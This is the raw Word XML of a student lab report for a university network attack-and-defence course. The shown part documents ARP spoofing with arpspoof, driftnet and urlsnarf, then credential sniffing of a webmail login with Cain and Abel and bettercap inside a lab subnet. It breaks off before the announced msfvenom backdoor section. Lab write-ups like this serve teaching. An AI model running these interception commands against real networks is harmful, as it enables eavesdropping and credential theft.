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FC7DC1" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="100" w:line="240" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验报告模板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41711673" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>华南理工大学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77229B" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>《网络攻防原理与技术》课程实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37774C35" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：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     </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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中间人攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>后门程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B3540F" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="830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06"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D583C" w14:paraId="74D8267C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8306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ACB63D" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体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="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>实验概述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D583C" w14:paraId="2CA93F4B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="830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496B91" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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【实验目的及要求】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B071B7" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsia="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>实验目的：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="560763BA" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="353535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掌握</w:t>
            </w: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ARP</w:t>
            </w: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欺骗攻击的原理和防范措施 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7489C623" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="353535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熟悉使用</w:t>
            </w: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Cain</w:t>
            </w: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软件</w:t>
            </w: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/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Bettercap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嗅探口令</w:t>
            </w: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ab/>
            </w:r>
          </w:p>
          <w:p w14:paraId="6483184F" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr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熟悉使用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msfvenom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生成后门程序</w:t>
            </w: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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1448889C" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="276" w:lineRule="auto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实验要求：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DAD9074" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="000D58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  <w:p w14:paraId="468B8C6E" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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</w:rPr>
              <w:t>【实验环境】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72972D14" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLineChars="202" w:firstLine="424"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>操作系统：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Windows XP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D583C" w14:paraId="0A3B7FB4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="830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DF0CB" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体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="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
              </w:rPr>
              <w:t>实验内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D583C" w14:paraId="02872D98" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="830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9EDBDB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【实验方案设计】</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="146534A2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1.ARP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欺骗</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09A0D6B0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2.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口令嗅探</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A58DB60" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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3.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后门程序</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE4EFFB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【实验过程】（实验步骤、记录、数据、分析）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D73EA3" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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实验内容一：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ARP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欺骗</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668AAD82" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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在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Kali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终端输入</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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ifconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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得到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Kali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的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IP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地址是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10.0.2.6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="712F3A34" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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在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win8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终端输入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ipconfig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得到他的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IP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地址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10.0.2.5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，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Gateway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的地址是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10.0.2.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD8BEE6" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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在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kali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>echo 1 &gt;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/proc/sys/net/ipv4/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ip_forward</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="AppleSystemUIFont" w:eastAsia="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05204783" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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ppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>输入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arp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-a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>查看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arp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="AppleSystemUIFont" w:hAnsi="AppleSystemUIFont" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42642AC8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7F747210" wp14:editId="3148C23B">
                  <wp:extent cx="4237355" cy="847725"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                  <wp:docPr id="1" name="图片 1" descr="屏幕快照 2018-10-25 下午3.42.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屏幕快照 2018-10-25 下午3.42.3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5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A0B5B" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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在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kali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输入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arpspoof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-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i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eth1 -t 10.0.2.5 -r 10.0.2.1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进行欺骗</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D226D96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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4F5012FF" wp14:editId="4DF59801">
                  <wp:extent cx="5135880" cy="1060450"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
                  <wp:docPr id="2" name="图片 2" descr="屏幕快照 2018-10-25 下午3.42.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屏幕快照 2018-10-25 下午3.42.4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88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2F0ED" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w: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>driftnet -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i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eth0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7371A157" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2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在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>win8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>机器打开浏览器，打开</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>www.scut.edu.cn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69478083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已经监听到</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>win8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>浏览的的内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="771A0FCE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61D53042" wp14:editId="4AA94245">
                  <wp:extent cx="4380230" cy="3136265"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
                  <wp:docPr id="3" name="图片 3" descr="屏幕快照 2018-10-25 下午3.46.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屏幕快照 2018-10-25 下午3.46.4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230" cy="313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D5975" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="clear" w:pos="312"/>
              </w:tabs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在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w: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urlsnarf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-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i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eth0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监听靶机</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FBDAEA6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5A60394A" wp14:editId="3882BF20">
                  <wp:extent cx="4030345" cy="3397885"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="2540"/>
                  <wp:docPr id="4" name="图片 4" descr="屏幕快照 2018-10-25 下午3.43.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屏幕快照 2018-10-25 下午3.43.5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345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E20BA4" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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口令嗅探</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE57DCD" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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Cain and Abel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B17F889" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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下载安装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Cain and Abel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A6A285" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4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进行相关配置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B5A0CE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0AEAF00A" wp14:editId="7207790F">
                  <wp:extent cx="2245995" cy="2799715"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="635"/>
                  <wp:docPr id="15" name="图片 15" descr="屏幕快照 2018-11-08 上午11.16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屏幕快照 2018-11-08 上午11.16.4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995" cy="279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23BC34F4" wp14:editId="06483BE7">
                  <wp:extent cx="2202815" cy="2752090"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="635"/>
                  <wp:docPr id="16" name="图片 16" descr="屏幕快照 2018-11-08 上午11.16.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屏幕快照 2018-11-08 上午11.16.4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75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6EC87" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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开始嗅探：扫描同一子网内所有主机的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Mac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地址</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500CF43F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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1C2EB66E" wp14:editId="47196590">
                  <wp:extent cx="1689735" cy="2773045"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="8255"/>
                  <wp:docPr id="17" name="图片 17" descr="屏幕快照 2018-11-08 上午11.17.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屏幕快照 2018-11-08 上午11.17.0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89735" cy="277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345A29B8" wp14:editId="01FF3A9C">
                  <wp:extent cx="4430395" cy="2882900"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="3175"/>
                  <wp:docPr id="18" name="图片 18" descr="屏幕快照 2018-11-08 上午11.17.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屏幕快照 2018-11-08 上午11.17.2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395" cy="288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0302BC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其中：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 xml:space="preserve"> 10.0.2.6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为靶机地址，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10.0.2.1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为</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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GateWay</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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地址</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A8CA4B6" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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在靶机中登录华工邮箱</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4097BFB8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37782014" wp14:editId="16737BF5">
                  <wp:extent cx="3606165" cy="2277110"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="8890"/>
                  <wp:docPr id="19" name="图片 19" descr="屏幕快照 2018-11-08 上午11.26.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屏幕快照 2018-11-08 上午11.26.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165" cy="227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2DB60" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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Cain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已经获取靶机登录相关信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC6AA12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noProof/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="67672491" wp14:editId="7AF2C236">
                  <wp:extent cx="4781550" cy="2912745"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                  <wp:docPr id="21" name="图片 21" descr="屏幕快照 2018-11-08 上午11.15.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屏幕快照 2018-11-08 上午11.15.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29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75738" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="000D58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</w:p>
          <w:p w14:paraId="6759E1A6" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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Kali Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E328321" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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353535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echo 1 &gt; /proc/sys/net/ipv4/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  <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ip_forward</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="72DD836B" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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apt-get install 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bettercap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>安装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bettercap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="37079895" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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运行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bettercap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="39755795" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr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set 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arp.spoof.targets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10.0.2.5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设置目标为靶机</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65ADC598" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="480"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arp.spoof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on</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56824996" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="480"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net.sniff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on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="353535"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>打开嗅探器</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F4DD283" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4E119544" wp14:editId="13983117">
                  <wp:extent cx="5136515" cy="1402080"/>
                  <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
                  <wp:docPr id="5" name="图片 5" descr="屏幕快照 2018-10-25 下午4.14.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屏幕快照 2018-10-25 下午4.14.3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515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1CF52" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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在靶机上打开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http://webmail.scut.edu.cn/scutmail/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCB4D90" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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登录邮箱，不选</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="756B5FCE" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr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嗅探器已经获取用户名和密码信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33476184" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="000D58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</w:p>
          <w:p w14:paraId="5474CC36" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="509FFB99" wp14:editId="2483F7EC">
                  <wp:extent cx="2950845" cy="2048510"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
                  <wp:docPr id="6" name="图片 6" descr="屏幕快照 2018-10-25 下午4.15.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屏幕快照 2018-10-25 下午4.15.2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845" cy="204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B037E" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC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hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="75CADC51" wp14:editId="0273097D">
                  <wp:extent cx="5039995" cy="2523490"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="635"/>
                  <wp:docPr id="7" name="图片 7" descr="屏幕快照 2018-10-25 下午4.12.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屏幕快照 2018-10-25 下午4.12.3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995" cy="252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1C460" w14:textId="77777777" w:rsidR="000D583C" w:rsidRDefault="00937AEC">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
